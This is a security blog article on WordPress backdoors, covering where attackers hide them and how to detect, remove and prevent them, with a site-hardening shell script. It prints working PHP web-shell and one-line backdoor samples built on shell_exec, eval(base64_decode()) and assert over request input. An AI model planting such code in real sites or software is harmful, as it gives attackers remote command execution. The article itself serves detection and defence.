WordPress Malware and Backdoors: How Attackers Maintain Persistent Access

Once a WordPress site is compromised, attackers install backdoors to maintain access even after vulnerabilities are patched. Learn how to detect and remove them.

WPSentry Team, March 8, 2026

What Are WordPress Backdoors?

A backdoor is a piece of malicious code hidden within your WordPress installation that allows an attacker to bypass normal authentication and regain access to your site at any time. Even after you patch the original vulnerability and change all passwords, a backdoor provides persistent access.

Backdoors are typically installed after an initial compromise through another vulnerability (XSS, SQLi, brute force, etc.).

Common Types of WordPress Backdoors

1. PHP Web Shells

Full-featured interfaces that allow file management, database access, and command execution:

<?php
// Often obfuscated or encoded
if(isset($_REQUEST['cmd'])){
  echo shell_exec($_REQUEST['cmd']);
}
?>

2. One-Line Backdoors

Minimal code that is easy to hide inside a legitimate file. Note the PHP version dependence: the /e modifier of preg_replace() was removed in PHP 7.0 and assert() stopped evaluating string arguments in PHP 8.0, so the second and third forms below only work on legacy installs, while the eval(base64_decode()) form works on every PHP version:

<?php eval(base64_decode($_POST['data'])); ?>
<?php @assert($_GET['cmd']); ?>
<?php preg_replace('/.*/e', $_POST['code'], ''); ?>

3. Database-Stored Backdoors

Malicious code stored in wp_options (for example inside theme or widget settings) rather than in a file, so it survives file-level malware scans. Stored PHP does not run by itself: there is usually a small loader on disk, often a few lines in a theme's functions.php or in a plugin, that reads the option and passes it to eval() on every page load, so finding the loader is how you find the payload. Injected JavaScript in a widget needs no loader at all; WordPress prints it into every page and it runs in each visitor's browser.

4. Modified Core Files

Attackers inject code into WordPress core files like wp-includes/version.php or wp-admin/includes/class-wp-upgrader.php, files that are loaded on every request and that few people ever open. Because every core file has a published checksum, a core file integrity check detects these reliably.

Where Attackers Hide Backdoors

  • /wp-content/uploads/ — PHP files disguised as images or hidden in year/month folders
  • /wp-includes/ — Modified core files or new files with legitimate-sounding names
  • /wp-content/themes/ — Inactive themes that nobody checks
  • /wp-content/plugins/ — Fake plugins or modified legitimate plugin files
  • .htaccess — Redirect rules (for example sending search-engine visitors to spam pages) or handler directives that make the web server execute .jpg, .txt or other non-PHP extensions as PHP
  • wp-config.php — Additional code appended to the configuration file
  • Cron jobs — Using wp_schedule_event() to periodically reinstall backdoors

How to Detect Backdoors

  1. Core file integrity checking — Compare your WordPress files against the official checksums with wp core verify-checksums. This covers wp-admin/, wp-includes/ and the root files only; wp plugin verify-checksums --all does the same for plugins installed from wordpress.org, and themes have no official checksums at all, so wp-content/ still needs the checks below
  2. Look for suspicious functions — Search for eval(), base64_decode(), assert(), preg_replace() with the /e modifier, system(), exec(), passthru(). Legitimate code uses some of these too (base64_decode() especially), so prioritise hits in uploads, in files with odd names or locations, and anywhere the argument comes from $_GET, $_POST or $_REQUEST
  3. Check file modification dates — Files modified after your last legitimate update are suspicious. Attackers can backdate timestamps with touch, so an old date is not proof of innocence
  4. Scan the uploads directory — PHP files should never be in /wp-content/uploads/, and check content as well as extension: a file named logo.jpg whose bytes start with <?php is a web shell, not an image
  5. Review cron events — List all scheduled events with wp cron event list and look for hooks you do not recognise; a backdoor reinstaller usually hides behind an innocuous-sounding hook name
  6. Monitor outbound connections — Backdoors often "phone home" to command-and-control servers; a web server that initiates connections to unfamiliar hosts is a strong signal

Removal and Recovery

  1. Take a full backup first (files and database) and keep it for forensic analysis; you will want to work out how the attacker got in
  2. Reinstall WordPress core from a clean source (wp core download --force --skip-content replaces wp-admin/, wp-includes/ and the root files without touching wp-content/). It overwrites known files but does not delete extra files an attacker added, so delete wp-admin/ and wp-includes/ before running it
  3. Remove all plugins and reinstall them from wordpress.org or from the vendor's original package, never from the compromised site's copy
  4. Switch to a fresh copy of your theme and delete every inactive theme
  5. Reset all passwords (WordPress users, database, FTP/SFTP, hosting panel)
  6. Regenerate WordPress salts and keys in wp-config.php (wp config shuffle-salts); this invalidates every existing login cookie, including any the attacker holds
  7. Review and clean the database (check wp_options and widget settings for injected content)
  8. Set up monitoring to detect reinfection; a backdoor you missed shows up as the same files reappearing

Prevention

  • Keep everything updated — core, themes, and plugins
  • Use strong, unique passwords with 2FA enabled
  • Restrict file permissions (wp-config.php: 400, directories: 755, files: 644). The 400 assumes PHP runs as the file's owner; with a separate web-server user, 440 plus group ownership is the workable equivalent
  • Disable file editing from the WordPress admin: define('DISALLOW_FILE_EDIT', true);
  • Run regular security scans to detect changes
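
The file-level items of the prevention list as a script, added here as an example; it is not part of the original page or of WordPress. Assumptions: Apache 2.4 with .htaccess overrides enabled for the uploads directory (on nginx the equivalent is a location block that returns 403 for PHP under uploads), the target modes listed above, the site root passed via a WP_ROOT variable, and a build_fixture() function that constructs a small tree with deliberately wrong modes for a dry run.

```shell
#!/bin/sh
# Hardening for the prevention list above. Added example for this article; not
# code from the page or from WordPress. Assumptions: WP_ROOT is the WordPress
# root; Apache 2.4 honours .htaccess under uploads (nginx users need a location
# block returning 403 for PHP there instead); target modes are the ones listed
# above (wp-config.php 400, directories 755, files 644); the fixture is constructed.
set -u

# Deny direct requests for anything PHP-like under uploads. This stops a dropped
# web shell from being reached over HTTP; it does not stop code that is include()d
# from elsewhere, which is what the integrity checks are for.
write_uploads_htaccess() {
    cat > "$1/wp-content/uploads/.htaccess" <<'EOF'
<FilesMatch "\.(php|phtml|php[0-9]|phar)$">
    Require all denied
</FilesMatch>
EOF
}

# Report every path that deviates from the target modes, one "kind path" per line.
# On 400: it only works when PHP runs as the file's owner; with a separate
# web-server user, 440 plus group ownership is the workable equivalent.
audit_permissions() {
    find "$1" -type d ! -perm 755 | sed 's/^/dir  /'
    find "$1" -type f ! -name wp-config.php ! -perm 644 | sed 's/^/file /'
    if [ -f "$1/wp-config.php" ]; then
        find "$1/wp-config.php" ! -perm 400 | sed 's/^/conf /'
    fi
}

# Apply the target modes. Run as the owner of the tree.
apply_permissions() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f ! -name wp-config.php -exec chmod 644 {} +
    if [ -f "$1/wp-config.php" ]; then chmod 400 "$1/wp-config.php"; fi
}

# Add define('DISALLOW_FILE_EDIT', true) to wp-config.php if absent. It must come
# before wp-settings.php is required, so it is inserted just above that line.
ensure_disallow_file_edit() {
    cfg="$1/wp-config.php"
    if grep -q 'DISALLOW_FILE_EDIT' "$cfg"; then return 0; fi
    tmp=$(mktemp)
    awk '/wp-settings\.php/ && !done { print "define(\047DISALLOW_FILE_EDIT\047, true);"; done = 1 }
         { print }' "$cfg" > "$tmp"
    if ! grep -q 'DISALLOW_FILE_EDIT' "$tmp"; then
        rm -f "$tmp"; echo "no wp-settings.php require found in $cfg" >&2; return 1
    fi
    cat "$tmp" > "$cfg" && rm -f "$tmp"
}

# Constructed fixture: a tiny tree with the sloppy modes a careless deploy leaves.
build_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/uploads/2026/03" "$root/wp-includes"
    printf '%s\n' '<?php' "define('DB_NAME', 'wordpress');" \
        "require_once ABSPATH . 'wp-settings.php';" > "$root/wp-config.php"
    printf '%s\n' '<?php' '$wp_version = "6.7";' > "$root/wp-includes/version.php"
    find "$root" -type d -exec chmod 755 {} +
    find "$root" -type f -exec chmod 644 {} +
    chmod 777 "$root/wp-content/uploads" "$root/wp-includes/version.php"  # world-writable
    echo "$root"
}

# Usage: WP_ROOT=/var/www/html sh harden.sh  (audit, fix, re-audit)
if [ -n "${WP_ROOT:-}" ]; then
    echo "== before"; audit_permissions "$WP_ROOT"
    ensure_disallow_file_edit "$WP_ROOT"
    write_uploads_htaccess "$WP_ROOT"
    apply_permissions "$WP_ROOT"
    echo "== after";  audit_permissions "$WP_ROOT"
fi
```

The order matters: the define is written while wp-config.php is still writable, and the permission pass comes last so the new .htaccess gets 644 as well. Re-run audit_permissions from cron; a directory that drifts back to 777 or a file that is suddenly 755 is worth a look in itself.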

Frequently Asked Questions

What is a WordPress backdoor?

A backdoor is malicious code hidden within your WordPress installation that allows an attacker to bypass normal authentication and regain access at any time. Even after you patch the original vulnerability and change passwords, a backdoor provides persistent access.

Where do attackers hide backdoors?

Common hiding locations include /wp-content/uploads/ (PHP files disguised as images), /wp-includes/ (modified core files), inactive themes and plugins, .htaccess files, wp-config.php, and WordPress cron jobs that periodically reinstall backdoors.

How do I detect a backdoor?

Use core file integrity checking (wp core verify-checksums), search for suspicious PHP functions like eval(), base64_decode(), and system(), check file modification dates, scan the uploads directory for PHP files, review scheduled cron events, and monitor outbound connections.

How do I remove a backdoor and recover?

Take a full backup for forensic analysis, reinstall WordPress core from a clean source, remove and reinstall all plugins from wordpress.org, switch to a fresh theme copy, reset all passwords, regenerate WordPress salts and keys, clean the database, and set up monitoring for reinfection.

How do I prevent backdoors?

Keep everything updated, use strong unique passwords with 2FA, restrict file permissions (wp-config.php: 400, directories: 755, files: 644), disable file editing with DISALLOW_FILE_EDIT, and run regular security scans to detect changes early.
